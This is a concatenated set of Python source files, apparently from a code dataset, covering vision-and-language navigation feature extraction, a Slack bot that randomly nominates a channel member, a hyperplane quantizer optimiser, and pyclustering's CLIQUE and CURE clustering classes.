# Each vertex has a max of 8 possible nav directions
# Each target is [heading, elevation, dist]
features = np.zeros([VIEWPOINT_SIZE, 10, 3], dtype=np.float32)
for ix in range(VIEWPOINT_SIZE):
if ix == 0:
sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
sim.makeAction(0, 1.0, 1.0)
else:
sim.makeAction(0, 1.0, 0)
state = sim.getState()
assert state.viewIndex == ix
all_nav_except_stay = state.navigableLocations[1:]
target_mapping = lambda l: [l.rel_heading, l.rel_elevation, l.rel_distance]
filter_distances = lambda l: l[2] <= 5 and l[2] >= 0.5
list_of_navs = map(target_mapping, all_nav_except_stay)
list_of_navs = list(filter(filter_distances, list_of_navs))
n_arr = np.array(list_of_navs, dtype=np.float32)
if len(n_arr) > 0:
features[ix, :len(n_arr)] = n_arr
t_render.toc()
writer.writerow({
'scanId': scanId,
'viewpointId': viewpointId,
'nav': base64.b64encode(features).decode('ascii')
})
count += 1
if count % 100 == 0:
print('Processed %d / %d viewpoints, %.1fs avg render time, projected %.1f hours' %\
(count,len(viewpointIds), t_render.average_time,
(t_render.average_time)*(len(viewpointIds)- count)/3600))
def read_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = TSV_FIELDNAMES)
for item in reader:
item['nav'] = np.frombuffer(base64.b64decode(item['nav']),
dtype=np.float32).reshape(-1, 10, 3)
in_data.append(item)
return in_data
if __name__ == "__main__":
build_tsv()
data = read_tsv(OUTFILE)
print('Completed %d viewpoints' % len(data))
```
#### File: tasks/R2R-pointing/data.py
```python
import base64
import csv
import sys
import numpy as np
IMG_FIELDNAMES = ['scanId', 'viewpointId', 'image_w','image_h', 'vfov', 'features']
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
FEATURE_SIZE = 2048 # 2048
NAV_FIELDNAMES = ['scanId', 'viewpointId', 'nav']
csv.field_size_limit(sys.maxsize)
def read_img_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = IMG_FIELDNAMES)
for item in reader:
item['image_h'] = int(item['image_h'])
item['image_w'] = int(item['image_w'])
item['vfov'] = int(item['vfov'])
item['features'] = np.frombuffer(base64.b64decode(item['features']),
dtype=np.float32).reshape((VIEWPOINT_SIZE, FEATURE_SIZE))
in_data.append(item)
return in_data
def read_navigable_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = NAV_FIELDNAMES)
for item in reader:
item['nav'] = np.round(np.frombuffer(base64.b64decode(item['nav']),
dtype=np.float32), 8)
in_data.append(item)
return in_data
if __name__ == "__main__":
img_data = read_img_tsv("img_features/ResNet-152-imagenet.tsv")
nav_data = read_navigable_tsv("img_features/navigable.tsv")
```
#### File: tasks/R2R-pointing/models.py
```python
import torch
from torch import nn
from torch import functional as F
final_output_dims = [10, 3]
class LinearBinaryModel(nn.Module):
def __init__(self, *sizes, activation=nn.ReLU):
super(LinearBinaryModel, self).__init__()
assert len(sizes) >= 1, "Need at least one 'sizes' specified"
sizes = list(sizes) + [1]
self.layers = [nn.Linear(sizes[0], sizes[1])]
for i in range(1, len(sizes) - 1):
self.layers.append(activation())
self.layers.append(nn.Linear(sizes[i], sizes[i+1]))
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
# x is [-1, 2048]
y = x
y = self.layers(y).sigmoid()
return y
class LinearModel(nn.Module):
def __init__(self, *sizes, activation=nn.ReLU):
super(LinearModel, self).__init__()
assert len(sizes) >= 1, "Need at least one 'sizes' specified"
sizes = list(sizes) + [30]
self.layers = [nn.Linear(sizes[0], sizes[1])]
for i in range(1, len(sizes) - 1):
self.layers.append(activation())
self.layers.append(nn.Linear(sizes[i], sizes[i+1]))
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
# x is [-1, 2048]
y = x
y = self.layers(y)
y = y.view(-1, 10, 3)
y[:, :, :2] = y[:, :, :2].tanh()
y[:, :, 2] = y[:, :, 2].sigmoid() * 20
mask = y[:, :, 2] > 0.5
y[:, :, 0] *= mask
y[:, :, 1] *= mask
return y
# returns [-1, 10, 3]
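# Usage sketch: LinearModel(2048, 512) builds Linear(2048, 512) -> ReLU ->
# Linear(512, 30) (the trailing 30 = 10 * 3 outputs is appended by the
# constructor), so a [-1, 2048] feature batch maps to [-1, 10, 3] nav targets.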
``` |
{
"source": "josephchapman/slack_nominator",
"score": 3
} |
#### File: slack_nominator/classes/bot.py
```python
import os
import requests
import json
import datetime
from random import shuffle
from classes.user import *
from classes.cache import *
LEGACY_TOKEN = os.environ['SLACK_LEGACY_TOKEN']
# Methods:
# settings_read()
# select()
# _select(cached_members, inclusions)
# post_message(channel, message)
# assign()
class Bot():
def __init__(self):
self.settings_file = 'settings.json'
self.cache = Cache() # Instantiate the cache
def settings_read(self):
with open(self.settings_file, 'r') as infile:
settings_data = json.load(infile)
return settings_data
def select(self):
# This method is a wrapper around `_select()`
# It reads the settings and cache,
# then passes the required data to `_select()`
# Read cache file: `member_cache.json`
cache_data = self.cache.read()
# Read settings file: `settings.json`
settings_data = self.settings_read()
# Select a member from inclusions, using cached data for details
selected_member_obj = self._select(cache_data['Members'], settings_data['Inclusions'])
return selected_member_obj
def _select(self, cached_members, inclusions):
# Returns a `User` object (or None) from a list of `inclusions` based on attributes.
# The `cached_members` data is used to translate between `Real Name` and `ID`
# Turn `inclusions` into list of IDs
members = [cached_member['ID'] for cached_member in cached_members if cached_member['Real Name'] in inclusions]
# Shuffle the member IDs from cache
shuffle(members)
# Check they're included and active
# but not remote
for member in members:
member_obj = User(member)
if (
member_obj.presence() == 'active' and
not member_obj.remote()
):
print('Selected Member: {}'.format(str(member_obj.names())))
return member_obj
else:
print('Selected Member: NONE FOUND')
return None
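# Illustrative sketch (hypothetical data): with
#   cached_members = [{'ID': 'U123', 'Real Name': 'Ada'}, {'ID': 'U456', 'Real Name': 'Bob'}]
#   inclusions = ['Ada']
# only 'U123' is considered, and it is returned as a User object provided the
# member is active and not remote.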
def post_message(self, channel, message):
# As of October 2017, this API method accepts 'Content-type': 'application/json',
# https://api.slack.com/methods/chat.postMessage
# https://api.slack.com/changelog/2017-10-keeping-up-with-the-jsons
# The requests.post request can therefore use the `json` option to send the payload.
# http://docs.python-requests.org/en/master/user/quickstart/#passing-parameters-in-urls
# `json` option requires requests version 2.4.2. Run `pip show requests` to view installed version.
headers = {
'Content-type': 'application/json; charset=UTF-8',
'Authorization': 'Bearer {}'.format(LEGACY_TOKEN)
}
payload = {
'channel': channel,
'text': message,
'as_user': 'false',
'username': 'Slack Nominator',
'icon_emoji': ':game_die:'
}
r = requests.post(
'https://slack.com/api/chat.postMessage',
headers=headers,
json=payload
)
return r.text
def assign(self):
# Read settings file: `settings.json`
settings_data = self.settings_read()
cache_data = self.cache.read()
# Convert timestamps in the cache file to datetime objects
latest_flush_strp = datetime.datetime.strptime(cache_data['Latest Flush'], '%Y-%m-%d %H:%M:%S')
latest_update_strp = datetime.datetime.strptime(cache_data['Latest Update'], '%Y-%m-%d %H:%M:%S')
# if it's Monday and cache wasn't already flushed today
if (
datetime.date.today().weekday() == 0 and
not latest_flush_strp.date() == datetime.datetime.now().date()
):
self.cache.flush()
# Update cache
cache_data = self.cache._update(settings_data['Settings']['Channel Scan'], cache_data)
# Select member
selected_member_obj = self._select(cache_data['Members'], settings_data['Inclusions'])
action = 'take notes in the huddle today'
# Post message
if selected_member_obj:
user_id = selected_member_obj.id
username, real_name = selected_member_obj.names()
message = '{0} (<@{1}>) has been randomly selected to {2}'.format(real_name, user_id, action)
print(message)
response = self.post_message(settings_data['Settings']['Channel Post'], message)
print('Response: {}\n'.format(response))
else:
message = 'I failed to find a valid user to {}'.format(action)
print(message)
response = self.post_message(settings_data['Settings']['Channel Post'], message)
print('Response: {}\n'.format(response))
``` |
{
"source": "JosephChataignon/limited-comparators-quantizer",
"score": 3
} |
#### File: JosephChataignon/limited-comparators-quantizer/core.py
```python
import numpy as np
import copy
import update,utils
import visualization as visu
import measures as ms
def centroids(hyperplanes,param,distrib,dataset=None):
"""
Gives the centroid of every non-void region. The returned object is an
array containing every non-void regions with the coordinates of its
centroid.
param is the number of realisations of f on the whole space that are
used for computing the centroids. Increasing it improves precision but
also increases computation time.
"""
output = []
rpr = [] # realisations per region
for i in range(param):
x = utils.f(len(hyperplanes[0])-1 , distrib, dataset)
r = utils.findRegion(x,hyperplanes)
ir = -1 # index of r in the array output
for j in range(len(output)): # check if r is already registered
if np.all(output[j][0] == r):
ir = j
break
if ir == -1:
output.append([r,x])
rpr.append(1.)
else:
output[ir][1] += x
rpr[ir] += 1.
# divide the coordinates for each region by the rpr for that region
for k in range(len(output)):
output[k][1] /= rpr[k]
return np.array(output)
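# Usage sketch (assuming 2D hyperplanes of the form [a, b, c] for ax+by+c=0,
# as consumed by utils.findRegion): estimate region centroids from 10000
# random draws of a Gaussian distribution.
#   hp = np.array([[1., 0., 0.], [0., 1., 0.]])
#   c = centroids(hp, 10000, 'gaussian')
# Each entry of c is [region_signature, centroid_coordinates].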
def optimisation(hp,pCentroids,pMeasure,pOptimisation,visualisation=[False,False,10],wTitle='',distrib='gaussian',m='mse',updateMethod='random directions',precisionCheck=False,structureCheck=False):
'''
Uses an update function to update the hyperplanes hp, with pCentroids
and pMeasure as parameters of the functions centroids() and measure().
pOptimisation: number of iterations
visualisation = [bool visualiseInitial, bool visualiseSteps, int stepsInterval]
wTitle: the title used for visualisation
distrib: the random distribution studied
updateMethod: the method to use
If precisionCheck, it is checked whether or not the new config generated
is better than the previous one.
If structureCheck, it is checked whether or not the structure of the new
config (hyperplanes intersections, regions) is different from the
previous one.
'''
measureEvolution = [ms.measure(m,hp,pCentroids,pMeasure,distrib)]
saveHyperplanes = [hp]
if visualisation[0]:
visu.visualiseHyperplanes(hp,wTitle+', iteration= %d, error= %f'%(0,measureEvolution[-1]),5,distrib)
# optimization steps
for k in range(1,pOptimisation+1):
print('optimisation function: iteration',k,'of',pOptimisation)
u = update.choseUpdateFunction(updateMethod,k)
if u == 'oneVarInterpolation':
for i in range(len(hp)):
for j in range(len(hp[i])):
hp,newMeasure = update.oneVarInterpolation(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
distrib,m,
precisionCheck,
structureCheck,
var=[i,j])
elif u == 'indVarByVar':
for i in range(len(hp)):
for j in range(len(hp[i])):
hp,newMeasure = update.updateHyperplanes(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
u,distrib,m,
precisionCheck,
structureCheck,
var=[i,j])
else:
hp,newMeasure = update.updateHyperplanes(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
u,distrib,m,
precisionCheck,
structureCheck)
measureEvolution.append(newMeasure)
saveHyperplanes.append(copy.deepcopy(hp))
# display result
if (k % visualisation[2] == 0) and visualisation[1]:
visu.visualiseHyperplanes( hp , wTitle+', iteration= %d, error= %f'%(k,measureEvolution[-1]) , 5 , distrib)
print('measureEvolution[-1]',measureEvolution[-1])
return measureEvolution,saveHyperplanes
``` |
{
"source": "JosephChataignon/pyclustering",
"score": 2
} |
#### File: ci/cloud/__main__.py
```python
import sys
from cloud.task import task
from cloud.task_handler import task_handler
def run():
if len(sys.argv) == 2:
client_task = task(sys.argv[1], [])
token = ""
elif len(sys.argv) < 3:
raise SyntaxError("ERROR: Incorrect amount of arguments '%d' "
"(please, see 'python3 ci/cloud --help')." % len(sys.argv))
else:
token = sys.argv[1]
action = sys.argv[2]
params = sys.argv[3:]
client_task = task(action, params)
task_handler(token).process(client_task)
if __name__ == '__main__':
try:
run()
exit(0)
except Exception as error:
print(error)
exit(-1)
```
#### File: pyclustering/cluster/clique.py
```python
import itertools
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.encoder import type_encoding
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.clique_wrapper as wrapper
import matplotlib
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import matplotlib.patches as patches
class clique_visualizer:
"""!
@brief Visualizer of CLIQUE algorithm's results.
@details CLIQUE visualizer provides visualization services that are specific for CLIQUE algorithm, for example,
to display grid and its density.
"""
__maximum_density_alpha = 0.6
@staticmethod
def show_grid(cells, data):
"""!
@brief Show CLIQUE blocks as a grid in data space.
@details Each block contains points, and its density is displayed accordingly. The CLIQUE grid helps to visualize
the grid that was used for the clustering process.
@param[in] cells (list): List of cells that is produced by CLIQUE algorithm.
@param[in] data (array_like): Input data that was used for clustering process.
"""
dimension = cells[0].dimensions
amount_canvases = 1
if dimension > 1:
amount_canvases = int(dimension * (dimension - 1) / 2)
figure = plt.figure()
grid_spec = gridspec.GridSpec(1, amount_canvases)
pairs = list(itertools.combinations(range(dimension), 2))
if len(pairs) == 0: pairs = [(0, 0)]
for index in range(amount_canvases):
ax = figure.add_subplot(grid_spec[index])
clique_visualizer.__draw_cells(ax, cells, pairs[index])
clique_visualizer.__draw_two_dimension_data(ax, data, pairs[index])
plt.show()
plt.close(figure)
@staticmethod
def show_clusters(data, clusters, noise=None):
"""!
@brief Display CLIQUE clustering results.
@param[in] data (list): Data that was used for clustering.
@param[in] clusters (array_like): Clusters that were allocated by the algorithm.
@param[in] noise (array_like): Noise that were allocated by the algorithm.
"""
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, data)
visualizer.append_cluster(noise or [], data, marker='x')
visualizer.show()
@staticmethod
def __draw_two_dimension_data(ax, data, pair):
"""!
@brief Display data in two-dimensional canvas.
@param[in] ax (Axis): Canvas where data should be displayed.
@param[in] data (list): Data points that should be displayed.
@param[in] pair (tuple): Pair of dimension indexes.
"""
ax.set_xlabel("x%d" % pair[0])
ax.set_ylabel("x%d" % pair[1])
for point in data:
if len(data[0]) > 1:
ax.plot(point[pair[0]], point[pair[1]], color='red', marker='.')
else:
ax.plot(point[pair[0]], 0, color='red', marker='.')
ax.yaxis.set_ticklabels([])
@staticmethod
def __draw_cells(ax, cells, pair):
ax.grid(False)
density_scale = max(len(cell.points) for cell in cells)
for cell in cells:
clique_visualizer.__draw_cell(ax, pair, cell, density_scale)
@staticmethod
def __draw_cell(ax, pair, cell, density_scale):
max_corner, min_corner = clique_visualizer.__get_rectangle_description(cell, pair)
belong_cluster = (len(cell.points) > 0)
if density_scale != 0.0:
density_scale = clique_visualizer.__maximum_density_alpha * len(cell.points) / density_scale
face_color = matplotlib.colors.to_rgba('blue', alpha=density_scale)
edge_color = matplotlib.colors.to_rgba('black', alpha=1.0)
rect = patches.Rectangle(min_corner, max_corner[0] - min_corner[0], max_corner[1] - min_corner[1],
fill=belong_cluster,
facecolor=face_color,
edgecolor=edge_color,
linewidth=0.5)
ax.add_patch(rect)
#ax.annotate(str(cell.logical_location), (min_corner[0], min_corner[1]), fontsize=6, ha='center', va='center')
@staticmethod
def __get_rectangle_description(cell, pair):
max_corner, min_corner = cell.spatial_location.get_corners()
max_corner = [max_corner[pair[0]], max_corner[pair[1]]]
min_corner = [min_corner[pair[0]], min_corner[pair[1]]]
if pair == (0, 0):
max_corner[1], min_corner[1] = 1.0, -1.0
return max_corner, min_corner
class spatial_block:
"""!
@brief Geometrical description of CLIQUE block in data space.
@details Provides services related to spatial functionality.
@see bang_block
"""
def __init__(self, max_corner, min_corner):
"""!
@brief Creates spatial block in data space.
@param[in] max_corner (array_like): Maximum corner coordinates of the block.
@param[in] min_corner (array_like): Minimal corner coordinates of the block.
"""
self.__max_corner = max_corner
self.__min_corner = min_corner
def __str__(self):
"""!
@brief Returns string block description.
@return String representation of the block.
"""
return "(max: %s; min: %s)" % (self.__max_corner, self.__min_corner)
def __contains__(self, point):
"""!
@brief Point is considered as contained if it lies in block (belong to it).
@return (bool) True if point is in block, otherwise False.
"""
for i in range(len(point)):
if point[i] < self.__min_corner[i] or point[i] > self.__max_corner[i]:
return False
return True
def get_corners(self):
"""!
@brief Return spatial description of current block.
@return (tuple) Pair of maximum and minimum corners (max_corner, min_corner).
"""
return self.__max_corner, self.__min_corner
class clique_block:
"""!
@brief CLIQUE block contains information about its logical location in grid, spatial location in data space and
points that are covered by the block.
"""
def __init__(self, logical_location=None, spatial_location=None, points=None, visited=False):
"""!
@brief Initializes CLIQUE block.
@param[in] logical_location (list): Logical location of the block in CLIQUE grid.
@param[in] spatial_location (spatial_block): Spatial location in data space.
@param[in] points (array_like): Points that belong to this block (can be obtained by method 'capture_points');
this parameter is used by CLIQUE in case of processing by the C++ implementation, when clustering
results are passed back to the Python code.
@param[in] visited (bool): Marks if block is visited during clustering process.
"""
self.__logical_location = logical_location or []
self.__spatial_location = spatial_location
self.__points = points or []
self.__visited = visited
def __str__(self):
"""!
@brief Returns string representation of the block using its logical location in CLIQUE grid.
"""
return str(self.__logical_location)
def __repr__(self):
"""!
@brief Returns string representation of the block using its logical location in CLIQUE grid.
"""
return str(self.__logical_location)
@property
def logical_location(self):
"""!
@brief Logical location is represented by coordinates in CLIQUE grid, for example, in case of 2x2 grid blocks
may have following coordinates: [0, 0], [0, 1], [1, 0], [1, 1].
@return (list) Logical location of the block in CLIQUE grid.
"""
return self.__logical_location
@logical_location.setter
def logical_location(self, location):
"""!
@brief Assign logical location to CLIQUE block.
@param[in] location (list): New logical location of the block in CLIQUE grid.
"""
self.__logical_location = location
@property
def spatial_location(self):
"""!
@brief Spatial location is represented by real data space coordinates.
@return (spatial_block) Spatial block that describes location in data space.
"""
return self.__spatial_location
@spatial_location.setter
def spatial_location(self, location):
"""!
@brief Assign spatial location to CLIQUE block.
@param[in] location (spatial_block): New spatial location of the block.
"""
self.__spatial_location = location
@property
def dimensions(self):
"""!
@brief Amount of dimensions where CLIQUE block is located.
@return (uint) Amount of dimensions where CLIQUE block is located.
"""
return len(self.__logical_location)
@property
def points(self):
"""!
@brief Points that belong to the CLIQUE block.
@details Points are represented by indexes that correspond to points in input data space.
@return (array_like) Points that belong to the CLIQUE block.
@see capture_points
"""
return self.__points
@property
def visited(self):
"""!
@brief Defines whether block is visited during cluster analysis.
@details If cluster analysis has not been performed then value will False.
@return (bool) True if block has been visited during processing, False otherwise.
"""
return self.__visited
@visited.setter
def visited(self, visited):
"""!
@brief Marks or unmarks block as a visited.
@details This setter is used by CLIQUE algorithm.
@param[in] visited (bool): New visited state for the CLIQUE block.
"""
self.__visited = visited
def capture_points(self, data, point_availability):
"""!
@brief Finds points that belong to this block using availability map to reduce computational complexity by
checking whether the point belongs to the block.
@details Algorithm complexity of this method is O(n).
@param[in] data (array_like): Data where points are represented as coordinates.
@param[in] point_availability (array_like): Contains boolean values that denote whether point is already belong
to another CLIQUE block.
"""
for index_point in range(len(data)):
if (point_availability[index_point] is True) and (data[index_point] in self.__spatial_location):
self.__points.append(index_point)
point_availability[index_point] = False
def get_location_neighbors(self, edge):
"""!
@brief Forms list of logical location of each neighbor for this particular CLIQUE block.
@param[in] edge (uint): Amount of intervals in each dimension that is used for clustering process.
@return (list) Logical location of each neighbor for this particular CLIQUE block.
"""
neighbors = []
for index_dimension in range(len(self.__logical_location)):
if self.__logical_location[index_dimension] + 1 < edge:
position = self.__logical_location[:]
position[index_dimension] += 1
neighbors.append(position)
if self.__logical_location[index_dimension] - 1 >= 0:
position = self.__logical_location[:]
position[index_dimension] -= 1
neighbors.append(position)
return neighbors
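# Worked example: for a block at logical location [1, 0] in a grid with
# edge = 3 intervals per dimension, the neighbors are
#   [[2, 0], [0, 0], [1, 1]]
# ([1, -1] is skipped because it falls outside the grid).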
class coordinate_iterator:
"""!
@brief Coordinate iterator is used to generate logical location description for each CLIQUE block.
@details This class is used by CLIQUE algorithm for clustering process.
"""
def __init__(self, dimension, intervals):
"""!
@brief Initializes coordinate iterator for CLIQUE algorithm.
@param[in] dimension (uint): Amount of dimensions in input data space.
@param[in] intervals (uint): Amount of intervals in each dimension.
"""
self.__intervals = intervals
self.__dimension = dimension
self.__coordinate = [0] * dimension
def get_coordinate(self):
"""!
@brief Returns current block coordinate.
"""
return self.__coordinate
def increment(self):
"""!
@brief Forms logical location for next block.
"""
for index_dimension in range(self.__dimension):
if self.__coordinate[index_dimension] + 1 < self.__intervals:
self.__coordinate[index_dimension] += 1
return
else:
self.__coordinate[index_dimension] = 0
self.__coordinate = None
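# Worked example: coordinate_iterator(dimension=2, intervals=2) enumerates the
# logical locations [0, 0], [1, 0], [0, 1], [1, 1] via successive increment()
# calls, after which get_coordinate() returns None.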
class clique:
"""!
@brief Class implements CLIQUE grid based clustering algorithm.
@details CLIQUE automatically finds subspaces with high-density clusters. It produces identical results
irrespective of the order in which the input records are presented and it does not presume any canonical
distribution for input data @cite article::clique::1.
Here is an example where data in two-dimensional space is clustered using CLIQUE algorithm:
@code
from pyclustering.cluster.clique import clique, clique_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# read two-dimensional input data 'Target'
data = read_sample(FCPS_SAMPLES.SAMPLE_TARGET)
# create CLIQUE algorithm for processing
intervals = 10 # defines amount of cells in grid in each dimension
threshold = 0 # lets consider each point as non-outlier
clique_instance = clique(data, intervals, threshold)
# start clustering process and obtain results
clique_instance.process()
clusters = clique_instance.get_clusters() # allocated clusters
noise = clique_instance.get_noise() # points that are considered as outliers (in this example should be empty)
cells = clique_instance.get_cells() # CLIQUE blocks that forms grid
print("Amount of clusters:", len(clusters))
# visualize clustering results
clique_visualizer.show_grid(cells, data) # show grid that has been formed by the algorithm
clique_visualizer.show_clusters(data, clusters, noise) # show clustering results
@endcode
In this example 6 clusters are allocated including four small cluster where each such small cluster consists of
three points. There are visualized clustering results - grid that has been formed by CLIQUE algorithm with
density and clusters itself:
@image html clique_clustering_target.png "Fig. 1. CLIQUE clustering results (grid and clusters itself)."
Sometimes such small clusters should be considered as outliers taking into account fact that two clusters in the
central are relatively huge. To treat them as a noise threshold value should be increased:
@code
intervals = 10
threshold = 3 # block that contains 3 or less points is considered as a outlier as well as its points
clique_instance = clique(data, intervals, threshold)
@endcode
Two clusters are allocated, but in this case some points in cluster-"circle" are also considered as outliers,
because CLIQUE operates with blocks, not with points:
@image html clique_clustering_with_noise.png "Fig. 2. Noise allocation by CLIQUE."
"""
def __init__(self, data, amount_intervals, density_threshold, **kwargs):
"""!
@brief Create CLIQUE clustering algorithm.
@param[in] data (list): Input data (list of points) that should be clustered.
@param[in] amount_intervals (uint): Amount of intervals in each dimension that defines amount of CLIQUE blocks
as \f[N_{blocks} = intervals^{dimensions}\f].
@param[in] density_threshold (uint): Minimum number of points that should contain CLIQUE block to consider its
points as non-outliers.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'ccore').
<b>Keyword Args:</b><br>
- ccore (bool): By default is True. If True then C++ implementation is used for cluster analysis, otherwise
Python implementation is used.
"""
self.__data = data
self.__amount_intervals = amount_intervals
self.__density_threshold = density_threshold
self.__ccore = kwargs.get('ccore', True)
if self.__ccore:
self.__ccore = ccore_library.workable()
self.__clusters = []
self.__noise = []
self.__cells = []
self.__cells_map = {}
self.__validate_arguments()
def process(self):
"""!
@brief Performs clustering process in line with rules of CLIQUE clustering algorithm.
@return (clique) Returns itself (CLIQUE instance).
@see get_clusters()
@see get_noise()
@see get_cells()
"""
if self.__ccore:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def get_clusters(self):
"""!
@brief Returns allocated clusters.
@remark Allocated clusters are returned only after data processing (method process()). Otherwise empty list is returned.
@return (list) List of allocated clusters, each cluster contains indexes of objects in list of data.
@see process()
@see get_noise()
"""
return self.__clusters
def get_noise(self):
"""!
@brief Returns allocated noise.
@remark Allocated noise is returned only after data processing (method process()). Otherwise empty list is returned.
@return (list) List of indexes that are marked as a noise.
@see process()
@see get_clusters()
"""
return self.__noise
def get_cells(self):
"""!
@brief Returns CLIQUE blocks that are formed during clustering process.
@details CLIQUE blocks can be used for visualization purposes. Each CLIQUE block contain its logical location
in grid, spatial location in data space and points that belong to block.
@return (list) List of CLIQUE blocks.
"""
return self.__cells
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using C++ implementation of CLIQUE algorithm that is used by default if
user's target platform is supported.
"""
result = wrapper.clique(self.__data, self.__amount_intervals, self.__density_threshold)
(self.__clusters, self.__noise, block_logical_locations, max_corners, min_corners, block_points) = result
amount_cells = len(block_logical_locations)
for i in range(amount_cells):
self.__cells.append(clique_block(block_logical_locations[i],
spatial_block(max_corners[i], min_corners[i]),
block_points[i],
True))
def __process_by_python(self):
"""!
@brief Performs cluster analysis using Python implementation of CLIQUE algorithm.
"""
self.__create_grid()
self.__allocate_clusters()
self.__cells_map.clear()
def __validate_arguments(self):
"""!
@brief Check input arguments of CLIQUE algorithm and if one of them is not correct then appropriate exception
is thrown.
"""
if len(self.__data) == 0:
raise ValueError("Empty input data. Data should contain at least one point.")
if self.__amount_intervals <= 0:
raise ValueError("Incorrect amount of intervals '%d'. Amount of intervals value should be greater than 0." % self.__amount_intervals)
if self.__density_threshold < 0:
raise ValueError("Incorrect density threshold '%f'. Density threshold should not be negative." % self.__density_threshold)
def __allocate_clusters(self):
"""!
@brief Performs cluster analysis using formed CLIQUE blocks.
"""
for cell in self.__cells:
if cell.visited is False:
self.__expand_cluster(cell)
def __expand_cluster(self, cell):
"""!
@brief Tries to expand cluster from specified cell.
@details During expanding points are marked as noise or append to new cluster.
@param[in] cell (clique_block): CLIQUE block from that cluster should be expanded.
"""
cell.visited = True
if len(cell.points) <= self.__density_threshold:
if len(cell.points) > 0:
self.__noise.extend(cell.points)
return
cluster = cell.points[:]
neighbors = self.__get_neighbors(cell)
for neighbor in neighbors:
if len(neighbor.points) > self.__density_threshold:
cluster.extend(neighbor.points)
neighbors += self.__get_neighbors(neighbor)
elif len(neighbor.points) > 0:
self.__noise.extend(neighbor.points)
self.__clusters.append(cluster)
def __get_neighbors(self, cell):
"""!
@brief Returns neighbors for specified CLIQUE block as clique_block objects.
@return (list) Neighbors as clique_block objects.
"""
neighbors = []
location_neighbors = cell.get_location_neighbors(self.__amount_intervals)
for i in range(len(location_neighbors)):
key = self.__location_to_key(location_neighbors[i])
candidate_neighbor = self.__cells_map[key]
if not candidate_neighbor.visited:
candidate_neighbor.visited = True
neighbors.append(candidate_neighbor)
return neighbors
def __create_grid(self):
"""!
@brief Creates CLIQUE grid that consists of CLIQUE blocks for clustering process.
"""
data_sizes, min_corner, max_corner = self.__get_data_size_description()
dimension = len(self.__data[0])
cell_sizes = [dimension_length / self.__amount_intervals for dimension_length in data_sizes]
self.__cells = [clique_block() for _ in range(pow(self.__amount_intervals, dimension))]
iterator = coordinate_iterator(dimension, self.__amount_intervals)
point_availability = [True] * len(self.__data)
self.__cells_map = {}
for index_cell in range(len(self.__cells)):
logical_location = iterator.get_coordinate()
iterator.increment()
self.__cells[index_cell].logical_location = logical_location[:]
cur_max_corner, cur_min_corner = self.__get_spatial_location(logical_location, min_corner, max_corner, cell_sizes)
self.__cells[index_cell].spatial_location = spatial_block(cur_max_corner, cur_min_corner)
self.__cells[index_cell].capture_points(self.__data, point_availability)
self.__cells_map[self.__location_to_key(logical_location)] = self.__cells[index_cell]
def __location_to_key(self, location):
"""!
@brief Forms key using logical location of a CLIQUE block.
@return (string) Key for CLIQUE block map.
"""
return ''.join(str(e) + '.' for e in location)
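# Example: the logical location [0, 1] maps to the key '0.1.', which is used
# to look up neighboring blocks in the cells map built by __create_grid.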
def __get_spatial_location(self, logical_location, min_corner, max_corner, cell_sizes):
"""!
@brief Calculates spatial location for CLIQUE block with logical coordinates defined by logical_location.
@param[in] logical_location (list): Logical location of CLIQUE block for that spatial location should be calculated.
@param[in] min_corner (list): Minimum corner of an input data.
@param[in] max_corner (list): Maximum corner of an input data.
@param[in] cell_sizes (list): Size of CLIQUE block in each dimension.
@return (list, list): Maximum and minimum corners for the specified CLIQUE block.
"""
cur_min_corner = min_corner[:]
cur_max_corner = min_corner[:]
dimension = len(self.__data[0])
for index_dimension in range(dimension):
cur_min_corner[index_dimension] += cell_sizes[index_dimension] * logical_location[index_dimension]
if logical_location[index_dimension] == self.__amount_intervals - 1:
cur_max_corner[index_dimension] = max_corner[index_dimension]
else:
cur_max_corner[index_dimension] = cur_min_corner[index_dimension] + cell_sizes[index_dimension]
return cur_max_corner, cur_min_corner
def __get_data_size_description(self):
"""!
@brief Calculates input data description that is required to create CLIQUE grid.
@return (list, list, list): Data size in each dimension, minimum and maximum corners.
"""
min_corner = self.__data[0][:]
max_corner = self.__data[0][:]
dimension = len(self.__data[0])
for index_point in range(1, len(self.__data)):
for index_dimension in range(dimension):
coordinate = self.__data[index_point][index_dimension]
if coordinate > max_corner[index_dimension]:
max_corner[index_dimension] = coordinate
if coordinate < min_corner[index_dimension]:
min_corner[index_dimension] = coordinate
data_sizes = [0.0] * dimension
for index_dimension in range(dimension):
data_sizes[index_dimension] = max_corner[index_dimension] - min_corner[index_dimension]
return data_sizes, min_corner, max_corner
```
#### File: pyclustering/cluster/cure.py
```python
import numpy
from pyclustering.cluster.encoder import type_encoding
from pyclustering.utils import euclidean_distance_square
from pyclustering.container.kdtree import kdtree
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.cure_wrapper as wrapper
class cure_cluster:
"""!
@brief Represents data cluster in CURE term.
@details CURE cluster is described by points of cluster, representation points of the cluster and by the cluster center.
"""
def __init__(self, point, index):
"""!
@brief Constructor of CURE cluster.
@param[in] point (list): Point represented by list of coordinates.
@param[in] index (uint): Index point in dataset.
"""
## List of points that make up cluster.
self.points = [ ]
